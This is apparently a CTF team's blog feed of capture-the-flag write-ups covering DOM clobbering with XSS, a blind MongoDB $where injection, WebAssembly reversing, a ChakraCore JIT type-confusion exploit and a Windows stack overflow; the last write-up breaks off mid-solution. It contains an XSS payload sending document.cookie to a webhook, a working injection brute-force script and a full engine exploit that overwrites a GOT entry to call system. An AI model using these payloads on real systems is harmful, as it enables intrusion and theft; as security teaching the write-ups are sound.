TRX Technical Labs - Qualification report

AmateursCTF 2023 - Sanity

info@theromanxpl0.it (TRX) — Tue, 25 Jul 2023 00:00:00 +0000

Context

We’re given a very simple website where we can write rants.

After posting our rant, we’re redirected to its page, where its title, content and a report link are shown.

We can see that the page accepts HTML. However, we can’t just write whatever we want, because the input is sanitized by the client using the Sanitizer API. Here’s the code of the rant page:


"en">


    "UTF-8">
    "X-UA-Compatible" content="IE=edge">
    "viewport" content="width=device-width, initial-scale=1.0">
    sanity - TRX%20is%20the%20%3Cb%3Ebest%3C%2Fb%3E



    "title">
        
    
    "paste">

The Sanitizer API is relatively recent, having been introduced between 2020 and 2021, and is a pretty solid way of preventing XSS: it won’t allow any JS code to be injected into the page. We can’t get around that.

What we can see, however, is that while the title is always sanitized, the content is sanitized only if the Debug class instructs to do so. The script will also check if window.debug.extension exists, after rendering the title, and will eventually load Debug’s configuration from the URL specified in there. If we’re able to inject that URL, we can disable sanitization. How?

DOM Clobbering’s magic

There’s a very nice technique to create objects inside window only using HTML: tags with an id attribute (name also works with some tags) will automatically be made available inside the window object by the browser. For example, will result in window.a being a reference to the image:

This doesn’t apply to all tags. Most notably, it applies to links, images, forms, iframes and objects.

A very useful consequence of this behaviour is that we can inject strings: calling toString() on a link will return its href attribute, and that’s exactly what we need. For this challenge, however, we need to create a string inside an object.

There are ways to clobber deeper than one level. One such way is to use form inputs, because they’re accessible from the parent form object. For example,

'a'>
    'b' />

would let us access the input using window.a.b. Other ways include nesting iframes and other objects, but it may be impossible to do so when dealing with sanitizers.

So it should be easy, right? We could try to put a link inside a link, or a link inside a form… but it’s not as straightforward as it seems. Let’s try it locally:

What’s happening?

Expect for inputs, objects can actually be referenced with their ID or name only from window directly, which makes sense. Can we get around that?

I got stuck here for a while, but as it turns out, we can. The key is having multiple objects with the same ID. While semantically incorrect, the JS engine will not ignore them, and will kindly put them in a collection for us; at that point, we can access a single object either by its array index or by its name, which will hopefully be unique.

Success!

Finalizing the payload

I spent a lot of time here, because my webhook address made the payload too long, and most free webhooks available online don’t allow enabling CORS headers, which are needed to make a successful cross-site fetch.

In the end, I settled for this title:

"debug">"debug" name="extension" href="//redacted.m.pipedream.net">

The Pipedream webhook would then send the header Access-Control-Allow-Origin: *, and a very simple JSON object:

{"report":true,"__proto__":{"sanitize":false}}

Why did I put sanitize inside __proto__? That was the only way I found to override a private property without a setter, as trying to inject sanitize directly would result in the error TypeError: Cannot set property sanitize of # which has only a getter.

Once sanitization is disabled, the challenge becomes a simple XSS. My rant’s content:

"/" onerror="window.location='https://webhook.site/redacted/?'+document.cookie" />

Putting everything together, we find that the admin’s cookie flag contained amateursCTF{s@nit1zer_ap1_pr3tty_go0d_but_not_p3rf3ct}.

Thoughts

Before this challenge I only knew the idea behind DOM clobbering and had never tried it. The solution was very short in the end, but I needed a lot of research to get to it. I found it fun and educational, and that’s why I decided to make a writeup. :)

HSCTF 10 - Flag Shop

info@theromanxpl0.it (TRX) — Mon, 12 Jun 2023 00:00:00 +0000

“hsctf pay to win confirmed?”

Prior knowledge: basic web-related knowledge, Burpsuite

Context

We are provided with the link to the website and its corresponding source code. The website appears to be very simple, and the source code is quite short:

Content of app.py:

import os
import traceback

import pymongo.errors
from flask import Flask, jsonify, render_template, request
from pymongo import MongoClient

app = Flask(__name__)
FLAG = os.getenv("FLAG")
app.config["SECRET_KEY"] = os.getenv("FLASK_SECRET")
mongo_client = MongoClient(connect=False)
db = mongo_client.database

@app.route("/")
def main():
	return render_template("index.html")

@app.route("/api/search", methods=["POST"])
def search():
	if request.json is None or "search" not in request.json:
		return jsonify({"error": "No search provided", "results": []}), 400
	try:
		results = db.flags.find(
			{
			"$where": f"this.challenge.includes('{request.json['search']}')"
			}, {
			"_id": False,
			"flag": False
			}
		).sort("challenge")
	except pymongo.errors.PyMongoError:
		traceback.print_exc()
		return jsonify({"error": "Database error", "results": []}), 500
	return jsonify({"error": "", "results": list(results)}), 200

if __name__ == "__main__":
	app.run()

So we know that the website uses MongoDB as its (NoSQL) database.

index.html and index.css don’t contain anything interesting, while index.js helps us understand that the buttons are useless and that api/search is the endpoint path used to make the POST request for the search.

Content of index.js:

const search_form = document.getElementById("search-form");
const search_input = document.getElementById("search");
const items = document.getElementById("items");

search_form.addEventListener("submit", function (event) {
	event.preventDefault();
	search(search_input.value);
});

async function search(val) {
	let resp = await fetch("/api/search", {
		method: "POST",
		headers: {
			"Content-Type": "application/json",
		},
		body: JSON.stringify({ search: val }),
	});

	let { error, results } = await resp.json();

	if (error) {
		items.textContent = error;
		return;
	}

	items.innerHTML = "";
	for (let { challenge, price } of results) {
		let row = document.createElement("tr");

		let chall_cell = document.createElement("td");
		chall_cell.textContent = challenge;

		let price_cell = document.createElement("td");
		price_cell.textContent = `$${price}.00`;

		let buy_cell = document.createElement("td");
		let buy_button = document.createElement("button");
		buy_button.textContent = "Buy Flag";
		buy_button.addEventListener("click", function () {
			alert("Not implemented yet!");
		});
		buy_cell.append(buy_button);

		row.append(chall_cell, price_cell, buy_cell);
		items.append(row);
	}
}

search("");

Nothing that we couldn’t have discovered by playing around with the website.

Playing around

A quick analysis of the code would have been enough to understand where the vulnerability lies, but my teammate and I decided to bombard the search field. Everything seems to be working correctly, and searching with an empty textfield returns all results.

The payloads from the PayloadsAllTheThings repository are mostly used for login bypass, while the SSJI payloads don’t seem to do anything.

When we send 0;return true, no result is displayed, while with ';return 'a'=='a' && ''==', the previous query result remains (unexpected behavior, it should give us either a different result or an error).

Stupidly, we didn’t take a look at the logs, but this is what happened if a 500 error code was obtained. Perfect! I only understood this after trying to send the payload to the api/search endpoint with Burp Repeater. We now know for sure that the vulnerability lies in the definition of the query.

@app.route("/api/search", methods=["POST"])
def search():
	if request.json is None or "search" not in request.json:
		return jsonify({"error": "No search provided", "results": []}), 400
	try:
		results = db.flags.find(
			{
			"$where": f"this.challenge.includes('{request.json['search']}')"
			}, {
			"_id": False,
			"flag": False
			}
		).sort("challenge")
	except pymongo.errors.PyMongoError:
		traceback.print_exc()
		return jsonify({"error": "Database error", "results": []}), 500
	return jsonify({"error": "", "results": list(results)}), 200

The if statement and error handling are normal. The only line to analyze is the $where clause.

Exploiting the vulnerability (extended thought process)

The input is directly inserted with an f-string with 0 sanitization. Referring to the MongoDB $where clause docs, we read:

Use the $where operator to pass either a string containing a JavaScript expression or a full JavaScript function to the query system.

It could be intuitively understood by reading the content of db.flags.find() that the $where clause executes any JavaScript code passed to it.

At this point, I copied the JS code to a code editor. When I have challenges like this, to make things easier for me, I copy the string and try to construct a very simple payload without moving the cursor.

With '); we escaped the string and closed the statement, giving us an SSJI. All that’s left is to get rid of the extra ')' at the end. I wasn’t able to do this (and I don’t think it was possible, but it certainly wasn’t necessary) since I couldn’t use comments. So, I went full monkey mode and just copied the previous function, forming a first test payload:

'); this.challenge.includes(', interpreted as this.challenge.includes(''); this.challenge.includes('') by the program. The output is what we expected and desired, which is to return all results (like a ' OR 1=1).

By testing or reading the documentation, we can discover that this happens because only the last valid condition is computed by the $where clause. This means that we can write anything in the first include, since it won’t be interpreted (something'); this.challenge.includes('):

While the second one is interpreted (something'); this.challenge.includes('search):

So we have the vulnerability, but we cannot directly retrieve the flag since it is excluded from the query (if you’re not sure, please reread the source code). I then tried a payload with a boolean operator (something'); always_true() || this.challenge.includes('something):

This is very useful for searching for a potential attack. We can perform a conditional check on the flag using && this.challenge.includes('flag') to only get results from the flag-shop entity. We can do a first test with the flag format (something'); this.flag.includes('flag{') && this.challenge.includes('flag):

We will have to take advantage of this behavior, performing a small brute force to reconstruct the flag character by character. We can now start to construct our payload.

Final payload

Payload used during the CTF

import requests
import urllib3
import string
import urllib
import time
import json
urllib3.disable_warnings()

url = "http://flag-shop.hsctf.com/api/search"
headers={'content-type': 'application/json'}
flag = "flag{"
search = f"kj'); this.flag.includes('{flag}') && this.challenge.includes('flag"


while True:
    for c in string.printable:
        try:
            print(c)
            if c not in ['*','+','.','?','|','&','$', '"', "'", "\\", "|", "/"]:
                search = f"kj'); this.flag.includes('{flag + c}') && this.challenge.includes('flag"
                payload = '{"search": "%s"}' % (search)
                print("connecting to CTF platform...")
                r = requests.post(url, data = payload, headers=headers, timeout=10)
                #print(payload)
                result = json.loads(r.text)
                print(result["results"])
                if bool(result["results"]):
                    print("Found one more char : %s" % (flag+c))
                    flag += c
        except:
            continue

Final payload

import requests
import urllib3
import string
import json
urllib3.disable_warnings()

url = "http://flag-shop.hsctf.com/api/search"
headers={'content-type': 'application/json'}
flag = "flag{"
search = f"kj'); this.flag.includes('{flag}') && this.challenge.includes('flag"


while True:
    for c in string.printable:
        try:
            if c not in ['*','+','.','?','|','&','$', '"', "'", "\\", "|", "/"]:
                search = f"kj'); this.flag.includes('{flag + c}') && this.challenge.includes('flag"
                payload = '{"search": "%s"}' % (search)
                r = requests.post(url, data = payload, headers=headers, timeout=10)
                result = json.loads(r.text)

                if bool(result["results"]):
                    print("Found one more char : %s" % (flag+c))
                    flag += c

        except:
            continue

As you can see, the only difference is that the first payload has more print statements.

This is because, due to the nature of the challenge and the fact that many others were also brute-forcing, the infrastructure became unresponsive for a few seconds, causing exceptions or blocking the request indefinitely.

The ‘print’ statements were only used for debugging (which is unnecessary when the infrastructure is not being bombarded), and in the second payload, I only left those related to the flag search.

if c not in ['*','+','.','?','|','&','$', '"', "'", "\\", "|", "/"]

is used to exclude characters that can cause problems with the payload string or the server, while the try/except is used to avoid losing progress in case of an error.

It was also very useful during the competition because CTRL-C moves on to the next character instead of closing the program.

This way, in case the program got stuck (which happened about ten times during the competition, but not at all when I tried it on the post-competition infrastructure), I would only skip one character instead of having to start over and retrieve the last characters manually.

In this case, I found a very simple blind NoSQL injection, but it is a good challenge if you are new to building custom payloads or have never encountered a blind NoSQL vulnerability before.

Thank you for reading until the end! I am happy to accept any questions or feedback.

CSAW '21 Embedded Security Challenge Reports

info@theromanxpl0.it (TRX) — Fri, 12 Nov 2021 00:00:00 +0000

The 2021 CSAW Embedded Security Challenge challenge was split in two tracks, and we participated in both. The following are our qualification and final competition reports, with which we placed 1st in both tracks.

TRX Technical Labs - Qualification report

TRX Technical Labs - Final report

TRX Research Labs - Qualification report

TRX Research Labs - Final report

CSAW '20 Embedded Security Challenge Report

info@theromanxpl0.it (TRX) — Thu, 12 Nov 2020 00:00:00 +0000

This year, we participated for the second time in the CSAW Embedded Security Challenge finals. This is our final report for the challenge, documenting our approach for all the challenges and the improvements we made to the emulator.

We did it again: just like last year, we completed all the qualifying challenges and the live challenge, and ranked first in the finals.

BSIDES 2020 - Snake

info@theromanxpl0.it (TRX) — Sat, 13 Jun 2020 15:08:35 +0200

This was a very interesting challenge and also the first time i reversed a web assembly binary.

Info

Points: 400

Description:

It is not a classic Snake game… Something is different.. Did you see it?! Do you think it is random? Well, think again:)

The Snake Bot

The site of the challenge has a simple snake game implemented in JavaScript and WebAsm.

The description of the challenge teels us to look at the differences with the traditional snake game, the only difference is that there are two different types of fruit.

Also, the order of the fruits stays the same, this suggests that the flag is encoded as binary sequence of theese fruits, in fact:

*  *        
 **         <--- this is a 0
 **
*  * 

 **
 **          <--- this is a 1
*  *
*  *

So, the first idea, without even looking at the wasm, was to create a snake bot to recover the sequence of the fruits, the result was very entertaining to whatch:

But unfortunately the sequence that we extracted was garbage:

BSidesU.Ñ9QÄ%6.FW5Y]..Ð..

Still the start of the string is correct which means we are on the right track, i guess we actually need to reverse the wasm.

Time to reverse

By placing a bunch of breakpoints in the code we find out that the function that checks if the snake is on the fruit is func15 and by looking at it we can see that the value of the fruit is decided here, by calling func7:

      local.get 36
      local.get 35
      i32.store offset=1116
      call 7                  <--------------------- call function 7 for the value of the fruit
      local.set 37
      i32.const 0
      local.set 38
      local.get 38
      local.get 37
      i32.store offset=1112         <-------- save the value returned in memory to pass it to the front end later
      i32.const 0
      local.set 39
      local.get 39

Looking at function 7 it is filled with the logic to trasform an integer to the corresponding binary, but it also has this block that is called every 8 fruits, in fact this block is used to generate a new number/letter for the flag, if we can reverse this we have the flag:

    block  ;; label = @1
      
      ------------------------------------------------------
      local.get 7                 <--- activates every 8 fruits
      br_if 0 (;@1;)
      ------------------------------------------------------
      
      i32.const 0
      local.set 8                 <---- takes a value A from memory (this is actually the value of the previus number)
      local.get 8
      i32.load8_u offset=1132
      
      ------------------------------------------------------
      
      local.set 9
      i32.const 24
      local.set 10
      local.get 9             
      local.get 10              <-----  some clean up on A
      i32.shl
      local.set 11
      local.get 11
      local.get 10
      i32.shr_s
      local.set 12
      
      ---------------------------------------------------------
      local.get 2
      i32.load offset=8          <------- Takes value B from memory (This is actually the count of how many fruits have been eaten % 56 )
      local.set 13
      i32.const 8
      local.set 14
      local.get 13
      local.get 14
      i32.div_s                  <------- Divides by 8 to obtain the number of letters generated until now
      local.set 15
      local.get 15
      i32.load8_u offset=1024    <------- Uses value B as and index to retrieve value C from the vector stored at this location (C = vect[B])
      local.set 16
      i32.const 255
      local.set 17
      local.get 16
      local.get 17
      i32.and                    <------- Some clean up on C
      ------------------------------------------------------------
 
      local.set 18
      local.get 12
      local.get 18
      i32.xor                   <----- takes the last number generated and does the xor with the value of the vector ( A ^ C )
      local.set 19
      i32.const 0
      local.set 20
      local.get 20
      local.get 19
      i32.store8 offset=1132    <----- saves the result of the vectors to generate the next 8 fruits
    end

After this we just need the starting value of the offset 1132 which we can find in the game_init function:

    i32.const 115
    set_local $var3
    
    .
    .
    .
    
    i32.const 0
    set_local $var50
    get_local $var50
    get_local $var3
    i32.store8 offset=1132

The starting value is 115, with this i recreated the code in python and obtained the values generated by the game, the result is:

BSidesTetNCBTsBSidesTetNCBTsBSidesTetNCBTsBSidesTetNCB

Which is still not the flag and is also different from what the Snake Bot returns (for some reason?).

But where is the flag? Well, if we look at the memory where the vector for the xor is located we can see that is actually a lot longer than required, in fact it is:

[49, 17, 58, 13, 1, 22, 39, 24, 26, 100, 2, 2, 2, 75, 44, 102, 66, 23, 11, 2, 50, 54, 92, 106, 48, 1, 2, 21, 38, 47, 63, 60, 70, 80, 22, 0, 64, 87, 59, 61, 27, 38, 43, 28, 91, 108, 51, 95, 7, 70, 28, 11, 1, 25]

Seeing this i tried the same xoring algorithm with the whole vector:

for i in range(0, len(xor_values)):
	start = start^xor_values[i]
	flag += chr(start)

And this gave me the flag:

BSidesTLV2020{W1sdom_i5_only_pOs5ess3d_by_th3_l34rned}

CSAW '19 Embedded Security Challenge Report

info@theromanxpl0.it (TRX) — Mon, 11 Nov 2019 00:00:00 +0000

We upload our final report for the CSAW 19 Embeded Security Challenge.

We had a faulty board so we emulated the challenges. Spoiler: we got the first place in EU.

Facebook CTF

info@theromanxpl0.it (TRX) — Thu, 31 Oct 2019 00:00:00 +0000

So we got a token from Facebook ctf

Trend Micro CTF 2019 libChakraCore.so

info@theromanxpl0.it (TRX) — Mon, 09 Sep 2019 00:00:00 +0000

If you already know the details of this challenge and bug, you can skip to the Exploit section

Due to all the materials published about Javascript engines exploitation, recently I have been trying more browser exploitation challenges.

The challenge

We are given two binaries

ch - which takes a null terminated javascript source file from stdin, writes it into a tmp directory and then executes it
libChakraCore.so - a compiled version of ChakraCore, a javascript engine from Microsoft

We are also given a .diff file

diff --git a/lib/Backend/GlobOptFields.cpp b/lib/Backend/GlobOptFields.cpp
index 88bf72d32..6fcb61151 100644
--- a/lib/Backend/GlobOptFields.cpp
+++ b/lib/Backend/GlobOptFields.cpp
@@ -564,7 +564,7 @@ GlobOpt::ProcessFieldKills(IR::Instr *instr, BVSparse *bv, bo
         break;

     case Js::OpCode::InitClass:
-    case Js::OpCode::InitProto:
+    //case Js::OpCode::InitProto:
     case Js::OpCode::NewScObjectNoCtor:
     case Js::OpCode::NewScObjectNoCtorFull:
         if (inGlobOpt)

So the organizers have disabled a case in a function called ProcessFieldKills

The bug

Searching for Chakra InitProto on google we can find several CVE. One of them is CVE-2019-0567 reported by lokihardt from Google Security who is also the author of this PoC


PoC for InitProto:

function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, 0x1234); // <-- This value is used as a pointer

    print(o.a);
}

main();

If you feed the PoC into the challenge binary you’ll get a SegFault before the print function terminates when libChakraCore.so tries to access [rax] with rax = 0x100…1234

(the 0x1 is used to differentiate numbers from pointers)

lokihardt explains that if we set proto as the prototype of tmp, proto’s layout in memory changes.

The jit compiler didn’t take this side effect into account at the time.

The challenge is basically a revert of the fixes that Microsoft applied.

Useful Reading

So to understand this issue a little bit better I read some general ChakraCore exploitation material such as

Bruno Keith Presentation on the subject

And also some specific analysis of this bug and two very similar bugs also discovered by lokihardt (basically corresponding to the other 3 cases that were not commented out)

It happens that for CVE-2019-0539 there are two nice blog posts from Perception Point

CVE-2019-0539 is a sibling bug of the one in the challenge, specifically the InitClass case I think

Summary

// chqmatteo: This diagram is borrowed from Perception Point (a similar diagram is in Bruno Keith slides)
// Memory layout of DynamicObject can be one of the following:
//        (#1)                (#2)                (#3)
//  +--------------+    +--------------+    +--------------+
//  | vtable, etc. |    | vtable, etc. |    | vtable, etc. |
//  |--------------|    |--------------|    |--------------|
//  | auxSlots     |    | auxSlots     |    | inline slots |
//  | union        |    | union        |    |              |
//  +--------------+    |--------------|    |              |
//                      | inline slots |    |              |
//                      +--------------+    +--------------+
// The allocation size of inline slots is variable and dependent on profile data for the
// object. The offset of the inline slots is managed by DynamicTypeHandler.

At the start, argument proto in opt(o, proto, value) has memory layout #3, setting it as a prototype makes it transition to layout #1

(in the different bug discussed by Bruno Keith, the transition is #3 -> #2 so there are some differences wrt offsets)

When opt gets jit compiled, the line o.a = value; is translated to a copy of value into the first inline slot of o, because for 2000 calls the layout in memory of o didn’t change from layout #1

The actual bug is that the logic to bail out from the optimizations when o’s memory layout actually changes is not present in the jit compiled code.

That’s why, when we finally call opt with {a:1, b:2} as both o and proto, we can write anything we want into the now auxSlots field of o (previously the first inline slot of o)

Turning this into arbitraty address read write

To turn this bug into an arbitrary address read write is a bit involved, the gist is that we have to use an object as a stepping stone to corrupt the metadata of two ArrayBuffers (called target and hax in Bruno Keith slides, dv1 and dv2 in Perception Point post)

The first ArrayBuffer is used to change the buffer pointer of the second ArrayBuffer. The buffer is the pointer to where the values of an array are actually stored.

The second ArrayBuffer is used to read from or write into the address that we want.

You can refer to the slides and the second blog post for a more detailed explaination.

Exploit

I’ll divide the exploit in three parts (Setup, Arbitrary address read and write, Code Execution) and explain a bit what each stage does

Setup

We first setup the four objects that we need o, obj, dv1, dv2. I’ll use Perception Point terminology because they included a PoC exploit which can be adapted to this bug

You can diff the two scripts to get the differences

obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

dv1 = new DataView(new ArrayBuffer(0x100));
dv2 = new DataView(new ArrayBuffer(0x100));

BASE = 0x100000000;

function hex(x) {
    return "0x" + x.toString(16);
}

function opt(o, c, value) {
    o.b = 1;

    let temp = {__proto__: c};

    o.a = value;
}

function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj); // o->auxSlots = obj (Step 1)

    /*
      chqmatteo: so we set o.c but it can be any name you want,
      it's just the third property of o
      so it will get written to o->auxSlots[2]
      similary obj.h is the 8th property of obj so we will write to obj->auxSlots[7]
      and buffer is at that offset
     */
    o.c = dv1; // obj->auxSlots = dv1 (Step 2)
    obj.h = dv2; // dv1->buffer = dv2 (Step 3)

Arbitrary address read and write

Here we set dv1->buffer to any address that we need

    let read64 = function(addr_lo, addr_hi) {
        // dv2->buffer = addr (Step 4)
        // chqmatteo: 0x38 = 7 * 8, we are writing at ((void*)dv1->buffer)[7] which is dv2->buffer
        dv1.setUint32(0x38, addr_lo, true);
        dv1.setUint32(0x3C, addr_hi, true);

        // read from addr (Step 5)
        return dv2.getInt32(0, true) + dv2.getInt32(4, true) * BASE;
    }
    let read3232 = function(addr_lo, addr_hi) {
        // dv2->buffer = addr (Step 4)
        dv1.setUint32(0x38, addr_lo, true);
        dv1.setUint32(0x3C, addr_hi, true);

        // read from addr (Step 5)
        return [dv2.getInt32(0, true), dv2.getInt32(4, true)];
    }

    let write64 = function(addr_lo, addr_hi, value_lo, value_hi) {
        // dv2->buffer = addr (Step 4)
        dv1.setUint32(0x38, addr_lo, true);
        dv1.setUint32(0x3C, addr_hi, true);

        // write to addr (Step 5)
        dv2.setInt32(0, value_lo, true);
        dv2.setInt32(4, value_hi, true);
    }

    // chqmatteo: the first value of the object is the pointer to the vtable
    vtable_lo = dv1.getUint32(0, true);
    vtable_hi = dv1.getUint32(4, true);
    print(hex(vtable_lo + vtable_hi * BASE));

    // chqmatteo: demonstrate arbitrary read
    print(hex(read64(vtable_lo, vtable_hi)));

This is basically where Perception Point blog post ends

Code execution

Now we can:

read and write any address we want using from dv2
plus we can read and write everything in the metadata of dv2 using dv1.

One thing that is useful from the metadata of dv2 is the vtable pointer.

The vtable pointer points to an address inside libChakraCore.so. That is we can compute the base address of the library leaking the vtable pointer and reading from that address.

One common technique to gain code execution from arbitrary write is to write the address of system or one_gadget into a got entry of the binary

From the base address of libChakraCore.so we can compute the address of the got section and from there we can leak the base address of libc

Since the got of libChakraCore.so is writable I tried with various offsets, but without success.

So after a couple of failed tries, I searched for how to trigger calls to standard library from a javascript context and found this writeup

https://bruce30262.github.io/Chakrazy-exploiting-type-confusion-bug-in-ChakraCore/

Looked for got in the writeup and found that you can trigger memmove with some_array.set(other_array)

The nice thing of memmove is that the first argument is a string and is the destination buffer of the memory move, so we can control the first argument of system So I overwrote the corresponding entry in got with the address of system.

    // compute some useful offsets, just try them all until it works
    let gdb_base = 0xc3a52000; // libChakraCore.so base addr in gdb

    let vptr_off = 0xc48566e0 - gdb_base;
    let chackra_base_lo = vtable_lo - vptr_off;

    let malloc_got = 0xc48a56e0 - gdb_base;
    // write targets
    let free_got = 0xc48a5128 - gdb_base
    let memmove = free_got - 0x128 + 0x108
    let memset = free_got - 0x128 + 0x248

    let one_gadget = 0x4f440; // actually it's system because the one gadgets that I tried didn't work

    print(hex(chackra_base_lo + vtable_hi * BASE));
    print('malloc and free')
    // get libc offsets to find libc version
    print(hex(read64(chackra_base_lo + malloc_got, vtable_hi)));
    print(hex(read64(chackra_base_lo + free_got, vtable_hi)));

    // read got to get libc base addr
    let libc = read3232(chackra_base_lo + free_got, vtable_hi);
    let free_off = 0x8dbce950 - 0x8db37000 // lost the gdb session so new base addr
    let libc_low = libc[0] - free_off;
    let libc_high = libc[1];
    print(hex(libc_low + libc_high * BASE))
    print('Writing on got');

    write64(chackra_base_lo + memmove, vtable_hi, libc_low + one_gadget, libc_high);
    // write64(chackra_base_lo + memset, vtable_hi, libc_low + one_gadget, libc_high);
    print('there');

    // just a random size and name, you can put different values if you want
    let ab = new Uint8Array(0x1020);
    let ef = new Uint8Array(0x1020);
    let cmd = 'cat flag'
    for (let i = 0; i < 1000; i++) {
        ab[i] = 100 - i;
        ef[i] = cmd.charCodeAt(i);
    }
    ef[cmd.length] = 0;

    // easier to spot in the debugger
    ab[0] = 0x41
    ab[1] = 0x41
    ab[2] = 0x41
    ab[3] = 0x41
    ab[4] = 0;

    // triggers memmove when copying ef.buffer <- ab.buffer
    ef.set(ab);

    // write on *0x0, crash the binary, poor man's breakpoint
    write64(0x0, 0x0, libc_low + one_gadget, libc_high);

}

main();

WCTF 2019 BabyPwn

info@theromanxpl0.it (TRX) — Sat, 06 Jul 2019 00:00:00 +0000

We played WCTF 2019 as mhackeroni and we got 8th place with two almost finished challenges that we could not submit in time.

We got first blood and the only solve on the BabyPwn challenge.

We imagine that many teams were close to the solution and so we will explain our solution that surprisingly worked.

Fun fact: we solved it at 4 a.m., after that the “a bit drunk man” Andrea returned early to home at 2 a.m. under the solicitation of “a bit competitive man” Matteo.

PWN part

Reversing

The binary is a PE32 for Windows. The main function is located at 0x12FB0, IDA does not recognize it but it can be easily recognized going backward using the XREFs from the strings. After a bit of reverse engineering, all the functions corresponding to each functionality can be found. Note that the MD5 hashing service is completely useless. Diggin in the code a custom readline routine (0x12EA0) is used many times. This is the decompiled code:

int __cdecl readline(char *a1, int size)
{
  int result; // eax
  int i; // [esp+4Ch] [ebp-8h]
  char v4; // [esp+50h] [ebp-4h]

  __maybe_cfg_shit__((int)&unk_1D035);
  for ( i = 0; ; ++i )
  {
    result = getchar();
    v4 = result;
    if ( result == '\n' )
      break;
    result = i;
    if ( i >= size )
      break;
    a1[i] = v4;
  }
  return result;
}

As you can easily see this function is buggy, the NUL terminator is not placed.

Looking in the join routine we can see that this function reads the username and the password and the username is a global variable.

Let’s look at this snipped from such procedure:

  puts("[2]Input user info");
  print((int)"Username: ", v4);
  j_readline(username, 16);
  print((int)"Password: ", v1);
  j_readline(password, 10);
  puts("Message: ");
  puts("a.WCTF2019");
  puts("b.CyKOR");
  print((int)"> ", v2);
  j_readline(&a1, 1);
  if ( a1 == 'a' )
  {
    useless_shit = (int)"WCTF2019";
  }
  else
  {
    if ( a1 != 'b' )
      return puts("[!]Not available");
    useless_shit = (int)"CyKOR";
  }

You may also have noted the “useless_shit” shit, yeah this is a global variable just after username and it is placed to allow us to leak the binary base address. Filling the username with “a”*16 and then printing the username we will have a leak of an address in the .rdata section of the binary. username is printed at the end of the login routine.

Now we have a leak, but how we can get EIP control? Not with this vulnerability for sure.

The next vulnerability is pretty clear, for a “babypwner”. Look at the submit routine:

int submit()
{
  int result; // eax
  char v1; // ST0C_1
  char v2; // [esp+0h] [ebp-5Ch]
  signed int i; // [esp+4Ch] [ebp-10h]
  char Dst; // [esp+50h] [ebp-Ch]

  _theread_id_something__((int)&xxx);
  j_memset(&Dst, 0, 10u);
  puts("[*]Submit");
  puts("Me: I think this draft is cool enough.");
  result = puts("Me: Let's submit this masterpiece.");
  if ( dh_value_1 && dh_value_2 >= 32 )
  {
    for ( i = 0; i < 32; ++i )
    {
      result = i + dh_value_1;
      if ( *(unsigned __int8 *)(i + dh_value_1) != i + 1 )
        return result;
    }
    puts("Validation complete.");
    print((int)"Student ID: ", v2);
    getchar();
    j_readline(&Dst, 40);
    puts(&null_str);
    result = print((int)"[+]Done!", v1);
  }
  return result;
}

The Dst buffer on the stack is only 10 bytes and readline is called with 40 bytes as size argument. This is a clear stack buffer overflow. But how we can trigger it? There is a check based on the values computed by the Diffie Hellman part that we didn’t have analyzed yet. So we patch the check in the debugger and in our mind and we will return on it later.

Exploitation

The offset from Dest to the return address if 16 bytes and so can insert a ropchain of 28 bytes. We divide the exploit in two different steps done in two execution of the program. Luckily, ASLR in Windows is done at boot and we can use the first connection to leak the kernel32.dll base address and it will be the same also for the next connection.

The first ropchain simply print the contents of an .idata entry associated to a routine in kernel32. We choose GetProcessHeap. Note that we will not leak the address of GetProcessHeap but of the stub (always in kernel32) that jumps to GetProcessHeap.

In the second stage, we have only to exploit again the BOF in submit() and execute WinExec(“some command”, 0). This requires only 16 bytes because we can insert the command as username (we know the address of the .data section of the binary) and use it as the first parameter for WinExec.

Returning to the missed part, the check based on Diffie Hellman was the real struggle of this cryptopwn.

Cryptography part

Objective

To exploit the BOF in function submit we have to pass a validation check

  if ((SharedKey != 0) && (0x1f < _authed)) {
    i = 0;
    while (i < 0x20) {
      if ((uint)*(byte *)(SharedKey + i) != i + 1U) {
        return;
      }
      i = i + 1;
    }
    puts("Validation complete.");

SharedKey is a global variable that is set if we conclude correctly the “Diffie-hellman Key exchange” (option 1 of the Main menu)

This check requires SharedKey to be equal to 0102030405060708091011121314151617181920212223242526272829303132 when hex encoded.

To do so we have to carefully choose the parameters of the DH key exchange.

Challenge overview

In function dh_exchange at 0x00411ae0 we are asked for 3 hex-encoded values

p (in hexadecimal, length <= 1000) :
q (in hexadecimal, length <= 1000) :
g (in hexadecimal, 0x2 <= g <= 0x40 ) :

The three values are parsed and then passed to function key_exchange@0x00411f50

// function dh_exchange@0x00411ce1
...
  iVar1 = key_exchange(shared_secret,int_g,int_p,int_q);
  if (iVar1 == 0) {
    thunk_FUN_004124e0("DH key exchange failed.\n",unaff_DI);
    result = -1;
  }
  else {
    thunk_FUN_004124e0("DH key exchange succeeded!\n",unaff_DI);
….

If the exchange completes with success _authed and SharedKey will be set to come non zero value.

To at least complete the exchange, our parameters p, q, g need to satisfy some conditions:

q must be at least 0x200 bits long
q must divide p - 1
p, q must be prime

// function key_exchange@0x00411fc6
    ….
  q_bit_len_ge_200 = __gmpz_sizeinbase(q,2);
  if (q_bit_len_ge_200 < 0x200) {
    return 0;
  }

    ….

p_min_1_mod_q = __gmpz_divisible_p(p_minus_1,q);
  if (p_min_1_mod_q == 0) {
    return 0;
  }

    ….

  is_prime = rabin_miller(p);
  if ((is_prime != 0) && (is_prime = rabin_miller(q), is_prime != 0)) {

If all three conditions are satisfied we will be given g^b with b a random value 0x40 bytes long.

We will be prompted for g^a and then the server will compute the shared key as g^ab

// function key_exchange@0x00412064
    BCryptGenRandom((BCRYPT_ALG_HANDLE)0x0,nonce,0x40,2);
    …..
    __gmpz_set_str(b,nonce_hex,0x10);
    __gmpz_powm(g_to_b,g,b,p);
    __gmp_sprintf(local_8c4,&DAT_00418b38,g_to_b);
    thunk_FUN_004124e0("g^b : %s\n",0x3c);
    thunk_FUN_004124e0("input g^a (in hexadecimal, length <= 1000) :\n",g_to_a);

Solution

So we need to find a way to choose g^a so that g^ab mod p = 0x0102030405060708091011121314151617181920212223242526272829303132

